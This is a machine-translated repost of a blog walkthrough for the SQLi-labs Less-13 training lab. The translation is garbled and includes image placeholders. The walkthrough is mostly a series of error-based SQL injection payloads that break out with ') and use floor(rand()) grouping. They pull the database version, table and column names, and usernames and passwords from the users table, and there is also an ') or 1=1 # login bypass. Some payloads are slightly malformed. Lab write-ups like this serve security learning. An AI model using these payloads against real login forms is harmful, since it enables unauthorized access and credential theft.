SQLi-labs Menos-13

Others 2020-03-28 12:38:10 views: null

Menos-13 después de la inyección -Doble cotizaciones -Single -string - con un giro

0x01Aquí Insertar imagen Descripción

You
 have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near '1') LIMIT 
0,1' at line 1

La declaración de error se puede utilizar ') es cerrada

= Uname ') o #. 1. 1 = Aquí Insertar imagen Descripción
0x02. Obtenga la versión de base de datos

uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

Aquí Insertar imagen Descripción
0x03. Obtiene el nombre de la base

uname= ') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

Aquí Insertar imagen Descripción
0x04. Obtiene el nombre de la tabla

uname=) union select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=’security’ limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

Aquí Insertar imagen Descripción
Se puede obtener el nombre tabla adicional al cambiar el valor del límite

uname=) union select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=’security’ limit 3,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

Aquí Insertar imagen Descripción

0x05. Obtiene el nombre del campo

uname=') union select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema='security'and table_name='users'limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

Aquí Insertar imagen Descripción

Aquí Insertar imagen Descripción

uname=') union select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

Aquí Insertar imagen Descripción
0x06. Obtiene el número de campos

uname=') union select count(*),concat((select concat(count(*),0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

Aquí Insertar imagen Descripción
0x07. Obtiene el valor del campo

uname=') union select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit

Aquí Insertar imagen Descripción

Aquí Insertar imagen Descripción

significado específico y consulta la comprensión pueden ver el Menor-5

por todas partes
Publicado 15 artículos originales · ganado elogios 2 · Vistas 290
carta privada preocupaciones

Supongo que te gusta

Origin blog.csdn.net/qq_42630215/article/details/105139414
Recomendado
Clasificación
Diario
Más
2024-05-15(5)
2024-05-14(10)
2024-05-13(7)
2024-05-12(22)
2024-05-11(31)
2024-05-10(32)
2024-05-09(31)
2024-05-08(18)
2024-05-07(35)
2024-05-06(4)

Code World

© 2018 codetd.com